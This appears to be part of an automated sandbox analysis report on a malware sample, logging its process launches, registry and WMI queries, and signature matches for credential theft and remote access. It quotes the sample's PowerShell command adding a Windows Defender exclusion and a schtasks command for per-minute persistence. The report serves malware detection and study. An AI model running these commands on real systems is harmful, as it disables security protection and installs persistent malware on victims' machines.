Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW" Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Queries volume information: C:\Users\user\Desktop\Or3dzp4vB1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\0720XW Queries volume information: C:\Users\user\AppData\Roaming\0720XW VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\0720XW Queries volume information: C:\Users\user\AppData\Roaming\0720XW VolumeInformation
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2477373667.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2525940345.000000001CCAE000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2525940345.000000001CC75000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2525940345.000000001CC9C000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2477373667.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Or3dzp4vB1.exe, type: SAMPLE
Source: Yara match File source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Or3dzp4vB1.exe, type: SAMPLE
Source: Yara match File source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs